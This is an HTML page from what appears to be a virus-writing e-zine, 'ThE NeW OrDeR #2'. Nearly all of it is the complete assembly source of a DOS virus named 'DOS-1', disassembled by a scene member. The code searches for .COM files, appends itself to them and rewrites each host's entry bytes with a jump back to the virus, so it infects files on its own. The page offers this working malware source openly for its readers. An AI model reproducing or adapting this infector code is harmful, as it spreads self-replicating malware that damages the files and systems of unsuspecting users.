<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>DOS1</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.code<br>
org 100h<br>
start:<br>
dec bp<br>
nop<br>
int 20h<br>
<br>
HostFile:<br>
Virus_Entry:<br>
call GetOffset<br>
Displacement:<br>
db 'DOS-1',0<br>
<br>
GetOffset:<br>
pop si<br>
sub si,offset Displacement-start<br>
cld<br>
<br>
mov di,100h<br>
push di<br>
<br>
push si<br>
movsw<br>
movsw<br>
<br>
pop si<br>
lea dx,[si+VirusDTA-start]<br>
call SetDTA<br>
mov ax,1100h<br>
<br>
FindFirstNext:<br>
lea dx,[si+SearchString-start]<br>
int 21h<br>
<br>
or al,al<br>
jnz ResetDTA<br>
<br>
lea dx,[si+VirusDTA-start]<br>
mov ah,0fh<br>
int 21h<br>
or al,al<br>
jnz FindNextFile<br>
<br>
push dx<br>
mov di,dx<br>
<br>
mov word ptr [di+0Eh],1<br>
xor ax,ax<br>
mov [di+21h],ax<br>
mov [di+23h],ax<br>
<br>
lea dx,[si]<br>
call SetDTA<br>
<br>
lea dx,[di]<br>
mov ah,27h<br>
mov cx,4<br>
int 21h<br>
cmp byte ptr [si],'M'<br>
je CloseFile<br>
<br>
mov ax,[di+10h]<br>
mov [di+21h],ax<br>
<br>
cmp ax,0F800h<br>
ja CloseFile<br>
<br>
push ax<br>
lea dx,[si]<br>
call SetDTA<br>
lea dx,[di]<br>
mov ah,28h<br>
mov cx,end_virus-start<br>
int 21h<br>
<br>
xor ax,ax<br>
mov [di+21h],ax<br>
lea di,[si]<br>
<br>
mov ax,0E94Dh<br>
stosw<br>
pop ax<br>
stosw<br>
<br>
push dx<br>
lea dx,[si]<br>
call SetDTA<br>
<br>
pop dx<br>
mov ah,28h<br>
mov cx,4<br>
int 21h<br>
<br>
CloseFile:<br>
pop dx<br>
<br>
call SetDTA<br>
mov ah,10h<br>
int 21h<br>
<br>
FindNextFile:<br>
mov ah,12h<br>
jmp short FindFirstNext<br>
<br>
ResetDTA:<br>
mov dx,80h<br>
call SetDTA<br>
retn<br>
<br>
SetDTA:<br>
mov ah,1Ah<br>
int 21h<br>
retn<br>
<br>
db 'MK'<br>
<br>
SearchString:<br>
db 0<br>
db '????????COM'<br>
end_virus:<br>
<br>
org 1d1h<br>
VirusDTA:<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
